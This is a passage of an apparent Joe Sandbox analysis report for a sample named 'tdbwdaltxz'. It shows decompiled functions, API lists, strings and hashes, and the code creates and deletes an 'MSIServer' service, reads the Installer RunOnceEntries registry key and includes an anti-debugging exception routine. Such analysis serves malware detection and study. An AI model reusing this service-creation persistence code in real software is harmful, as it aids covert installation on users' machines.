				void* __ebp;
				void* _t13;
				long _t14;
				void* _t18;
				void* _t27;
				void* _t29;
				void* _t30;

				_t28 = 0;
				_t29 = OpenSCManagerW(0, L"ServicesActive", 2);
				if(_t29 != 0) {
					lstrcpyW(_t30 + GetSystemDirectoryW( &_v548, 0x104) * 2 - 0x220, L"\\msiexec /V");
					_t13 = CreateServiceW(_t29, L"MSIServer", L"MSIServer", 0x10000000, 0x20, 3, 1,  &_v548, 0, 0, 0, 0, 0);
					__eflags = _t13;
					if(_t13 == 0) {
						_t14 = GetLastError();
						__eflags = _t14 - 0x431;
						if(_t14 != 0x431) {
							_push("Failed to create MSI service\n");
							_t18 = E01062E24() + 0x40;
							__eflags = _t18;
							_push(_t18);
							E01062F67(_t27, 0, _t29, _t18);
							_t28 = 1;
						}
						CloseServiceHandle(_t29);
						return _t28;
					} else {
						CloseServiceHandle(_t13);
						CloseServiceHandle(_t29);
						return 0;
					}
				} else {
					_push("Failed to open the service control manager.\n");
					_t24 = E01062E24() + 0x40;
					_push(E01062E24() + 0x40);
					E01062F67(_t27, 0, _t29, _t24);
					_t1 = _t28 + 1; // 0x1
					return _t1;
				}
			}













                        0x010610c2
                        0x010610cb
                        0x010610cf
                        0x0106110f
                        0x0106113c
                        0x01061142
                        0x01061144
                        0x0106115c
                        0x01061162
                        0x01061167
                        0x01061169
                        0x01061173
                        0x01061173
                        0x01061176
                        0x01061177
                        0x0106117f
                        0x0106117f
                        0x01061185
                        0x01061192
                        0x01061146
                        0x01061147
                        0x0106114e
                        0x0106115b
                        0x0106115b
                        0x010610d1
                        0x010610d1
                        0x010610db
                        0x010610de
                        0x010610df
                        0x010610e7
                        0x010610ef
                        0x010610ef

                        APIs
                        • OpenSCManagerW.ADVAPI32(00000000,ServicesActive,00000002), ref: 010610C5
                        • _fprintf.LIBCMT ref: 010610DF
                        • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 010610FC
                        • lstrcpyW.KERNEL32 ref: 0106110F
                        • CreateServiceW.ADVAPI32(00000000,MSIServer,MSIServer,10000000,00000020,00000003,00000001,?,00000000,00000000,00000000,00000000,00000000), ref: 0106113C
                        • CloseServiceHandle.ADVAPI32(00000000), ref: 01061147
                        • CloseServiceHandle.ADVAPI32(00000000), ref: 0106114E
                        Strings
                        Memory Dump Source
                        • Source File: 00000002.00000002.519471774.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true
                        • Associated: 00000002.00000002.519460950.0000000001060000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000002.00000002.519499181.000000000107B000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000002.00000002.519520197.0000000001080000.00000008.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000002.00000002.519530277.0000000001083000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_1060000_tdbwdaltxz.jbxd
                        Similarity
                        • API ID: Service$CloseHandle$CreateDirectoryManagerOpenSystem_fprintflstrcpy
                        • String ID: Failed to create MSI service$Failed to open the service control manager.$MSIServer$ServicesActive$\msiexec /V
                        • API String ID: 3223182415-3703814818
                        • Opcode ID: 318de05bf7f8e2a77c61cfd166cf95d57a7ffc1eeb23568f384dde7abacab70c
                        • Instruction ID: 81df750d754850f02e4f6a74b757f1a360b6ab76bd681e971d473c842beb9781
                        • Opcode Fuzzy Hash: 318de05bf7f8e2a77c61cfd166cf95d57a7ffc1eeb23568f384dde7abacab70c
                        • Instruction Fuzzy Hash: A5110872F40218B7E73166A9BC0EF9E375CEB84711F000066FE84EA140EAAAD94487F5
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00401C83 Relevance: 6.1, APIs: 4, Instructions: 73COMMONLIBRARYCODE
                        Download Yara Rule
                        C-Code - Quality: 85%
                        			E00401C83(intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4) {
				char _v0;
				struct _EXCEPTION_POINTERS _v12;
				intOrPtr _v80;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v608;
				intOrPtr _v612;
				void* _v616;
				intOrPtr _v620;
				char _v624;
				intOrPtr _v628;
				intOrPtr _v632;
				intOrPtr _v636;
				intOrPtr _v640;
				intOrPtr _v644;
				intOrPtr _v648;
				intOrPtr _v652;
				intOrPtr _v656;
				intOrPtr _v660;
				intOrPtr _v664;
				intOrPtr _v668;
				char _v808;
				char* _t39;
				long _t49;
				intOrPtr _t51;
				void* _t54;
				intOrPtr _t55;
				intOrPtr _t57;
				intOrPtr _t58;
				intOrPtr _t59;
				intOrPtr* _t60;

				_t59 = __esi;
				_t58 = __edi;
				_t57 = __edx;
				if(IsProcessorFeaturePresent(0x17) != 0) {
					_t55 = _a4;
					asm("int 0x29");
				}
				E00401E78(_t34);
				 *_t60 = 0x2cc;
				_v632 = E00402470(_t58,  &_v808, 0, 3);
				_v636 = _t55;
				_v640 = _t57;
				_v644 = _t51;
				_v648 = _t59;
				_v652 = _t58;
				_v608 = ss;
				_v620 = cs;
				_v656 = ds;
				_v660 = es;
				_v664 = fs;
				_v668 = gs;
				asm("pushfd");
				_pop( *_t15);
				_v624 = _v0;
				_t39 =  &_v0;
				_v612 = _t39;
				_v808 = 0x10001;
				_v628 =  *((intOrPtr*)(_t39 - 4));
				E00402470(_t58,  &_v92, 0, 0x50);
				_v92 = 0x40000015;
				_v88 = 1;
				_v80 = _v0;
				_t28 = IsDebuggerPresent() - 1; // -1
				_v12.ExceptionRecord =  &_v92;
				asm("sbb bl, bl");
				_v12.ContextRecord =  &_v808;
				_t54 =  ~_t28 + 1;
				SetUnhandledExceptionFilter(0);
				_t49 = UnhandledExceptionFilter( &_v12);
				if(_t49 == 0 && _t54 == 0) {
					_push(3);
					return E00401E78(_t49);
				}
				return _t49;
			}


































                        0x00401c83
                        0x00401c83
                        0x00401c83
                        0x00401c97
                        0x00401c99
                        0x00401c9c
                        0x00401c9c
                        0x00401ca0
                        0x00401ca5
                        0x00401cbd
                        0x00401cc3
                        0x00401cc9
                        0x00401ccf
                        0x00401cd5
                        0x00401cdb
                        0x00401ce1
                        0x00401ce8
                        0x00401cef
                        0x00401cf6
                        0x00401cfd
                        0x00401d04
                        0x00401d0b
                        0x00401d0c
                        0x00401d15
                        0x00401d1b
                        0x00401d1e
                        0x00401d24
                        0x00401d33
                        0x00401d3f
                        0x00401d4a
                        0x00401d51
                        0x00401d58
                        0x00401d63
                        0x00401d6b
                        0x00401d74
                        0x00401d76
                        0x00401d79
                        0x00401d7b
                        0x00401d85
                        0x00401d8d
                        0x00401d93
                        0x00000000
                        0x00401d9a
                        0x00401d9d

                        APIs
                        • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00401C8F
                        • IsDebuggerPresent.KERNEL32 ref: 00401D5B
                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00401D7B
                        • UnhandledExceptionFilter.KERNEL32(?), ref: 00401D85
                        Memory Dump Source
                        • Source File: 00000002.00000002.518311344.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_400000_tdbwdaltxz.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                        • String ID:
                        • API String ID: 254469556-0
                        • Opcode ID: 0b03b5c64497572952368c5c8e79ee91cfa7b3dc5a2986fe4eff801d6595a585
                        • Instruction ID: 03da4fdce737ae66b50b035683398d13283d912606226935be00c523356d6f7c
                        • Opcode Fuzzy Hash: 0b03b5c64497572952368c5c8e79ee91cfa7b3dc5a2986fe4eff801d6595a585
                        • Instruction Fuzzy Hash: F4314C75D0131C9BDB10DF61D949BCDBBB8BF08304F1041AAE44CAB290EB745A848F48
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 010552D8 Relevance: .6, Instructions: 596COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.519443945.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_1050000_tdbwdaltxz.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: d42d7ffa71f252afb3f50bf6578a06bef0b493eb251b735ea3cbd2341c153803
                        • Instruction ID: eee7381356d710e3615782975cb3fce6560bf04ed71ffb3622cf7d5b789e85d5
                        • Opcode Fuzzy Hash: d42d7ffa71f252afb3f50bf6578a06bef0b493eb251b735ea3cbd2341c153803
                        • Instruction Fuzzy Hash: 5C529E74E01229CFDB64DF69C894BADBBB2BB89300F1485EAD40DA7255DB319E81CF50
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0105590B Relevance: .2, Instructions: 193COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.519443945.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_1050000_tdbwdaltxz.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 2b90bd6fe88d9698b3f864fe581ba47d1884789f7ef887c4f6b7fb1381025883
                        • Instruction ID: 09fa3deb43930c5dae1341453eaf7081761839e92cd65c785d87840b3562c598
                        • Opcode Fuzzy Hash: 2b90bd6fe88d9698b3f864fe581ba47d1884789f7ef887c4f6b7fb1381025883
                        • Instruction Fuzzy Hash: E9A18D74A01228CFDB64DF64C994B9ABBB2BB4A301F5085EAD84DA7250DB319E81CF51
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 01055AEC Relevance: .1, Instructions: 116COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.519443945.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_1050000_tdbwdaltxz.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 6048cfe16ce25ef595def90e3ed41c4af10b268eb6158e291e2962308bb9bb83
                        • Instruction ID: 3e5c920716945b69990929042e23af99009385ad48baa600bc29ca1e42eb5c25
                        • Opcode Fuzzy Hash: 6048cfe16ce25ef595def90e3ed41c4af10b268eb6158e291e2962308bb9bb83
                        • Instruction Fuzzy Hash: 4F516E74A01228CFCB65DF24D994B9AB7B2FB4A305F5089EAD40EA7350DB319E81CF51
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 01061320 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 93memoryCOMMON
                        Download Yara Rule
                        C-Code - Quality: 92%
                        			E01061320(int _a4) {
				short _v8;
				signed int _v12;
				char _v92;
				short _v612;
				signed int _t33;
				void* _t41;
				void* _t55;
				struct HINSTANCE__* _t57;

				_t57 = GetModuleHandleA("msi.dll");
				_v612 = 0;
				if(GetModuleFileNameW(_t57,  &_v612, 5) == 0) {
					GetLastError();
				}
				_v92 = 0;
				_v12 = 0xa;
				0x1060000( &_v612,  &_v92,  &_v12, 0, 0);
				_t33 = LoadStringW(_t57, 0xa,  &_v8, 0);
				_v12 = _t33;
				_v8 = HeapAlloc(GetProcessHeap(), 0, 2 + _t33 * 2);
				_t55 = HeapAlloc(GetProcessHeap(), 0, 0x52 + _v12 * 2);
				_t41 = _v8;
				if(_t41 != 0 && _t55 != 0) {
					 *_t41 = 0;
					LoadStringW(_t57, 0xa, _v8, _v12 + 1);
					swprintf(_t55, _v12 + 1, _v8,  &_v92);
					_t41 = _v8;
				}
				HeapFree(GetProcessHeap(), 0, _t41);
				HeapFree(GetProcessHeap(), 0, _t55);
				ExitProcess(_a4);
			}











                        0x01061337
                        0x0106133b
                        0x01061354
                        0x01061356
                        0x01061356
                        0x01061360
                        0x01061373
                        0x0106137a
                        0x01061388
                        0x01061394
                        0x010613ac
                        0x010613c1
                        0x010613c3
                        0x010613c8
                        0x010613d0
                        0x010613de
                        0x010613f1
                        0x010613f6
                        0x010613f9
                        0x0106140e
                        0x01061416
                        0x0106141b

                        APIs
                        • GetModuleHandleA.KERNEL32(msi.dll,?), ref: 01061331
                        • GetModuleFileNameW.KERNEL32(00000000,?,00000005), ref: 0106134C
                        • GetLastError.KERNEL32 ref: 01061356
                        • LoadStringW.USER32(00000000,0000000A,00000001,00000000), ref: 01061388
                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 010613A1
                        • HeapAlloc.KERNEL32(00000000), ref: 010613AA
                        • GetProcessHeap.KERNEL32(00000000,0000000A), ref: 010613BC
                        • HeapAlloc.KERNEL32(00000000), ref: 010613BF
                        • LoadStringW.USER32(00000000,0000000A,00000001,0000000B), ref: 010613DE
                        • swprintf.LIBCMT ref: 010613F1
                        • GetProcessHeap.KERNEL32(00000000,00000001), ref: 01061405
                        • HeapFree.KERNEL32(00000000), ref: 0106140E
                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 01061413
                        • HeapFree.KERNEL32(00000000), ref: 01061416
                        • ExitProcess.KERNEL32 ref: 0106141B
                        Strings
                        Memory Dump Source
                        • Source File: 00000002.00000002.519471774.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true
                        • Associated: 00000002.00000002.519460950.0000000001060000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000002.00000002.519499181.000000000107B000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000002.00000002.519520197.0000000001080000.00000008.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000002.00000002.519530277.0000000001083000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_1060000_tdbwdaltxz.jbxd
                        Similarity
                        • API ID: Heap$Process$AllocFreeLoadModuleString$ErrorExitFileHandleLastNameswprintf
                        • String ID: msi.dll
                        • API String ID: 4014995864-3974507041
                        • Opcode ID: 0a33e521186df2e9f1d9d21cdeeda920f9874049c5a13d4cc69cea3ae593bb08
                        • Instruction ID: 381ae9cc35013970ce7a82e83cbd7f4576c94e092c77f6763ca0daef5b5f944e
                        • Opcode Fuzzy Hash: 0a33e521186df2e9f1d9d21cdeeda920f9874049c5a13d4cc69cea3ae593bb08
                        • Instruction Fuzzy Hash: CD31E571A00208BFEB21DBA4DD88FAEBBBCEF48700F000095B945E7154DA75AA459BA1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 010611A0 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 67serviceCOMMON
                        Download Yara Rule
                        C-Code - Quality: 75%
                        			E010611A0(void* __edi) {
				void* __ebx;
				void* __esi;
				long _t4;
				void* _t8;
				int _t10;
				void* _t15;
				void* _t23;
				void* _t28;

				_t21 = 0;
				_t28 = OpenSCManagerW(0, L"ServicesActive", 1);
				if(_t28 != 0) {
					_push(__edi);
					_t23 = OpenServiceW(_t28, L"MSIServer", 0x10000);
					__eflags = _t23;
					if(_t23 == 0) {
						_t4 = GetLastError();
						__eflags = _t4 - 0x424;
						if(_t4 != 0x424) {
							_push("Failed to open MSI service\n");
							_t8 = E01062E24() + 0x40;
							__eflags = _t8;
							_push(_t8);
							E01062F67(0, _t23, _t28, _t8);
							_t21 = 1;
						}
						CloseServiceHandle(_t28);
						return _t21;
					} else {
						_t10 = DeleteService(_t23);
						__eflags = _t10;
						if(_t10 == 0) {
							_push("Failed to delete MSI service\n");
							_t15 = E01062E24() + 0x40;
							__eflags = _t15;
							_push(_t15);
							E01062F67(0, _t23, _t28, _t15);
							_t21 = 1;
						}
						CloseServiceHandle(_t23);
						CloseServiceHandle(_t28);
						return _t21;
					}
				} else {
					_push("Failed to open service control manager\n");
					_t18 = E01062E24() + 0x40;
					_push(E01062E24() + 0x40);
					E01062F67(0, __edi, _t28, _t18);
					_t1 = _t21 + 1; // 0x1
					return _t1;
				}
			}











                        0x010611a9
                        0x010611b2
                        0x010611b6
                        0x010611d4
                        0x010611e6
                        0x010611e8
                        0x010611ea
                        0x01061224
                        0x0106122a
                        0x0106122f
                        0x01061231
                        0x0106123b
                        0x0106123b
                        0x0106123e
                        0x0106123f
                        0x01061247
                        0x01061247
                        0x01061253
                        0x0106125a
                        0x010611ec
                        0x010611ed
                        0x010611f3
                        0x010611f5
                        0x010611f7
                        0x01061201
                        0x01061201
                        0x01061204
                        0x01061205
                        0x0106120d
                        0x0106120d
                        0x01061219
                        0x0106121c
                        0x01061223
                        0x01061223
                        0x010611b8
                        0x010611b8
                        0x010611c2
                        0x010611c5
                        0x010611c6
                        0x010611ce
                        0x010611d3
                        0x010611d3

                        APIs
                        • OpenSCManagerW.ADVAPI32(00000000,ServicesActive,00000001), ref: 010611AC
                        • _fprintf.LIBCMT ref: 010611C6
                        • OpenServiceW.ADVAPI32(00000000,MSIServer,00010000), ref: 010611E0
                        • DeleteService.ADVAPI32(00000000), ref: 010611ED
                        • _fprintf.LIBCMT ref: 01061205
                        • CloseServiceHandle.ADVAPI32(00000000), ref: 01061219
                        • CloseServiceHandle.ADVAPI32(00000000), ref: 0106121C
                        Strings
                        • ServicesActive, xrefs: 010611A4
                        • Failed to open service control manager, xrefs: 010611B8
                        • Failed to delete MSI service, xrefs: 010611F7
                        • Failed to open MSI service, xrefs: 01061231
                        • MSIServer, xrefs: 010611DA
                        Memory Dump Source
                        • Source File: 00000002.00000002.519471774.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true
                        • Associated: 00000002.00000002.519460950.0000000001060000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000002.00000002.519499181.000000000107B000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000002.00000002.519520197.0000000001080000.00000008.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000002.00000002.519530277.0000000001083000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_1060000_tdbwdaltxz.jbxd
                        Similarity
                        • API ID: Service$CloseHandleOpen_fprintf$DeleteManager
                        • String ID: Failed to delete MSI service$Failed to open MSI service$Failed to open service control manager$MSIServer$ServicesActive
                        • API String ID: 2904554157-4128441400
                        • Opcode ID: 0044d9f41a24c1fea368da6f20674a65499a39c6c0dbf8d88dfc49f47b87e397
                        • Instruction ID: d70ab53e28578ea5fd8b691d87291236737b58028780e7657e3423b99680dcb0
                        • Opcode Fuzzy Hash: 0044d9f41a24c1fea368da6f20674a65499a39c6c0dbf8d88dfc49f47b87e397
                        • Instruction Fuzzy Hash: B101D6B2F41202A7E732366AAC49BCE369CDFD4751F040035FA80EA201EA6ADD5446B9
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 01075AAD Relevance: 24.1, APIs: 16, Instructions: 92COMMONLIBRARYCODE
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E01075AAD(void* __ebx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t12;
				intOrPtr _t13;
				intOrPtr _t17;
				intOrPtr* _t45;

				if(_a4 > 5 || _a8 == 0) {
					L4:
					return 0;
				} else {
					_t45 = E01064F0A(8, 1);
					_t52 = _t45;
					if(_t45 != 0) {
						_t12 = E01064F0A(0xb8, 1);
						 *_t45 = _t12;
						__eflags = _t12;
						if(_t12 != 0) {
							_t13 = E01064F0A(0x220, 1);
							 *((intOrPtr*)(_t45 + 4)) = _t13;
							__eflags = _t13;
							if(_t13 != 0) {
								E010755D5( *_t45, 0x1080d40);
								__eflags = E01075ECD(__ebx, __edx, 1, _t45,  *_t45, _a4, _a8);
								if(__eflags != 0) {
									_t17 = E0106DBBB(__edx, 1, __eflags,  *((intOrPtr*)( *_t45 + 4)),  *((intOrPtr*)(_t45 + 4)));
									__eflags = _t17;
									if(_t17 == 0) {
										 *((intOrPtr*)( *((intOrPtr*)(_t45 + 4)))) = 1;
										L17:
										return _t45;
									}
									E01064ED2( *((intOrPtr*)(_t45 + 4)));
									E0107024B( *_t45);
									E010700F1( *_t45);
									E01064ED2(_t45);
									L15:
									_t45 = 0;
									goto L17;
								}
								E0107024B( *_t45);
								E010700F1( *_t45);
								E01064ED2(_t45);
								goto L15;
							}
							E01064ED2( *_t45);
							E01064ED2(_t45);
							L8:
							goto L3;
						}
						E01064ED2(_t45);
						goto L8;
					}
					L3:
					 *((intOrPtr*)(E010647CC(_t52))) = 0xc;
					goto L4;
				}
			}










                        0x01075ab6
                        0x01075adc
                        0x00000000
                        0x01075abe
                        0x01075ac9
                        0x01075acd
                        0x01075acf
                        0x01075ae8
                        0x01075aef
                        0x01075af1
                        0x01075af3
                        0x01075b04
                        0x01075b0b
                        0x01075b0e
                        0x01075b10
                        0x01075b29
                        0x01075b3e
                        0x01075b40
                        0x01075b63
                        0x01075b6a
                        0x01075b6c
                        0x01075b94
                        0x01075b96
                        0x00000000
                        0x01075b96
                        0x01075b71
                        0x01075b78
                        0x01075b7f
                        0x01075b85
                        0x01075b8d
                        0x01075b8d
                        0x00000000
                        0x01075b8d
                        0x01075b44
                        0x01075b4b
                        0x01075b51
                        0x00000000
                        0x01075b56
                        0x01075b14
                        0x01075b1a
                        0x01075afb
                        0x00000000
                        0x01075afb
                        0x01075af6
                        0x00000000
                        0x01075af6
                        0x01075ad1
                        0x01075ad6
                        0x00000000
                        0x01075ad6

                        APIs
                        Memory Dump Source
                        • Source File: 00000002.00000002.519471774.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true
                        • Associated: 00000002.00000002.519460950.0000000001060000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000002.00000002.519499181.000000000107B000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000002.00000002.519520197.0000000001080000.00000008.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000002.00000002.519530277.0000000001083000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_1060000_tdbwdaltxz.jbxd
                        Similarity
                        • API ID: _free$__calloc_crt$___freetlocinfo___removelocaleref$Sleep__calloc_impl__copytlocinfo_nolock__setmbcp_nolock__wsetlocale_nolock
                        • String ID:
                        • API String ID: 2661855409-0
                        • Opcode ID: 104286de649f2d6f4931ad2800fec91f0cc7e5de3a14241637f554391639b97d
                        • Instruction ID: 9a1e47e32daa1478910b15b90e522ab9266e2bb8740fe6c329125001ad127caf
                        • Opcode Fuzzy Hash: 104286de649f2d6f4931ad2800fec91f0cc7e5de3a14241637f554391639b97d
                        • Instruction Fuzzy Hash: 6721B635D08703FEEB223F69DC45DDE7BE8EF61760B208429F5C895564EF6298208A5C
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 01061B50 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 99registrymemorystringCOMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E01061B50(short* _a4, intOrPtr _a8, WCHAR*** _a12) {
				void* _v8;
				int _v12;
				int _v16;
				intOrPtr _v20;
				void* _t29;
				intOrPtr _t43;
				intOrPtr _t54;
				void* _t57;
				void* _t60;

				_v12 = 0;
				_v16 = 0;
				_t57 = 0;
				if(RegOpenKeyW(0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\RunOnceEntries",  &_v8) == 0) {
					_t29 = RegQueryValueExW(_v8, _a4, 0,  &_v16, 0,  &_v12);
					__eflags = _t29;
					if(_t29 != 0) {
						L9:
						RegCloseKey(_v8);
						return _t57;
					} else {
						__eflags = _v16 - 1;
						if(_v16 != 1) {
							goto L9;
						} else {
							_t54 = lstrlenW( *( *_a12)) + _t34;
							_v20 = _t54;
							_t60 = HeapAlloc(GetProcessHeap(), 0, _v12 + 2 + _t54);
							__eflags = _t60;
							if(_t60 != 0) {
								E01063C60(_t60,  *( *_a12), _v20);
								_t43 = _v20;
								 *((short*)(_t43 + _t60)) = 0x20;
								__eflags = RegQueryValueExW(_v8, _a4, 0,  &_v16, _t43 + 2 + _t60,  &_v12);
								if(__eflags == 0) {
									E01061A90(__eflags, _t60, _a8, _a12);
									_t57 = 1;
								}
								HeapFree(GetProcessHeap(), 0, _t60);
								goto L9;
							} else {
								RegCloseKey(_v8);
								__eflags = 0;
								return 0;
							}
						}
					}
				} else {
					return 0;
				}
			}












                        0x01061b65
                        0x01061b6c
                        0x01061b73
                        0x01061b7d
                        0x01061b9b
                        0x01061ba1
                        0x01061ba3
                        0x01061c57
                        0x01061c5a
                        0x01061c67
                        0x01061ba9
                        0x01061ba9
                        0x01061bad
                        0x00000000
                        0x01061bb3
                        0x01061bc0
                        0x01061bce
                        0x01061bde
                        0x01061be0
                        0x01061be2
                        0x01061c02
                        0x01061c07
                        0x01061c12
                        0x01061c32
                        0x01061c34
                        0x01061c3d
                        0x01061c42
                        0x01061c42
                        0x01061c51
                        0x00000000
                        0x01061be4
                        0x01061be7
                        0x01061bee
                        0x01061bf4
                        0x01061bf4
                        0x01061be2
                        0x01061bad
                        0x01061b7f
                        0x01061b85
                        0x01061b85

                        APIs
                        • RegOpenKeyW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Installer\RunOnceEntries,?), ref: 01061B75
                        • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000), ref: 01061B9B
                        • lstrlenW.KERNEL32(?), ref: 01061BBA
                        • GetProcessHeap.KERNEL32(00000000,-00000002), ref: 01061BD1
                        • HeapAlloc.KERNEL32(00000000), ref: 01061BD8
                        • RegCloseKey.ADVAPI32(?), ref: 01061BE7
                        Strings
                        • Software\Microsoft\Windows\CurrentVersion\Installer\RunOnceEntries, xrefs: 01061B5B
                        Memory Dump Source
                        • Source File: 00000002.00000002.519471774.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true
                        • Associated: 00000002.00000002.519460950.0000000001060000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000002.00000002.519499181.000000000107B000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000002.00000002.519520197.0000000001080000.00000008.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000002.00000002.519530277.0000000001083000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_1060000_tdbwdaltxz.jbxd
                        Similarity
                        • API ID: Heap$AllocCloseOpenProcessQueryValuelstrlen
                        • String ID: Software\Microsoft\Windows\CurrentVersion\Installer\RunOnceEntries
                        • API String ID: 4113790418-2918440441
                        • Opcode ID: 9836e66c81c8235568c5ef19add951eb253312c11497c1e3410490ad8de1c549
                        • Instruction ID: a077f6b21ba31d1dcf03752a00769700df647098c60a341b5ea5ef9f043b4280
                        • Opcode Fuzzy Hash: 9836e66c81c8235568c5ef19add951eb253312c11497c1e3410490ad8de1c549
                        • Instruction Fuzzy Hash: FC313C72A0020CEFDB229FA8DC49FAEBBB9FF45310F004095F951E6150DB369A20DB90
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 01065168 Relevance: 19.6, APIs: 13, Instructions: 81COMMON
                        Download Yara Rule
                        C-Code - Quality: 78%
                        			E01065168(void* __eax, void* __ebx) {
				intOrPtr _t5;
				LONG* _t8;
				void* _t9;
				void* _t14;
				void* _t24;
				intOrPtr* _t25;
				intOrPtr* _t26;

				_t14 = __ebx;
				__imp__DecodePointer( *0x1081d68);
				_t25 =  *0x1081028;
				_t24 = __eax;
				if(_t25 != 0) {
					while( *_t25 != 0) {
						E01064ED2( *_t25);
						_t25 = _t25 + 4;
						if(_t25 != 0) {
							continue;
						}
						break;
					}
					_t25 =  *0x1081028;
				}
				_push(_t14);
				E01064ED2(_t25);
				_t26 =  *0x1081024;
				 *0x1081028 = 0;
				if(_t26 != 0) {
					while( *_t26 != 0) {
						E01064ED2( *_t26);
						_t26 = _t26 + 4;
						if(_t26 != 0) {
							continue;
						}
						break;
					}
					_t26 =  *0x1081024;
				}
				E01064ED2(_t26);
				 *0x1081024 = 0;
				E01064ED2( *0x1081020);
				_t5 = E01064ED2( *0x108101c);
				 *0x1081020 = 0;
				 *0x108101c = 0;
				if(_t24 != 0xffffffff) {
					_t5 = E01064ED2(_t24);
				}
				__imp__EncodePointer(0);
				 *0x1081d68 = _t5;
				_t6 =  *0x1081048;
				if( *0x1081048 != 0) {
					E01064ED2(_t6);
					 *0x1081048 = 0;
				}
				_t7 =  *0x108104c;
				if( *0x108104c != 0) {
					E01064ED2(_t7);
					 *0x108104c = 0;
				}
				_t8 = InterlockedDecrement( *0x10806ac);
				if(_t8 == 0) {
					_t8 =  *0x10806ac; // 0x10809a8
					if(_t8 != 0x10809a8) {
						_t9 = E01064ED2(_t8);
						 *0x10806ac = 0x10809a8;
						return _t9;
					}
				}
				return _t8;
			}










                        0x01065168
                        0x01065170
                        0x01065176
                        0x0106517c
                        0x01065180
                        0x01065182
                        0x01065189
                        0x0106518f
                        0x01065192
                        0x00000000
                        0x00000000
                        0x00000000
                        0x01065192
                        0x01065194
                        0x01065194
                        0x0106519a
                        0x0106519c
                        0x010651a1
                        0x010651aa
                        0x010651b2
                        0x010651b4
                        0x010651ba
                        0x010651c0
                        0x010651c3
                        0x00000000
                        0x00000000
                        0x00000000
                        0x010651c3
                        0x010651c5
                        0x010651c5
                        0x010651cc
                        0x010651d7
                        0x010651dd
                        0x010651e8
                        0x010651f0
                        0x010651f6
                        0x010651ff
                        0x01065202
                        0x01065207
                        0x01065209
                        0x0106520f
                        0x01065214
                        0x0106521b
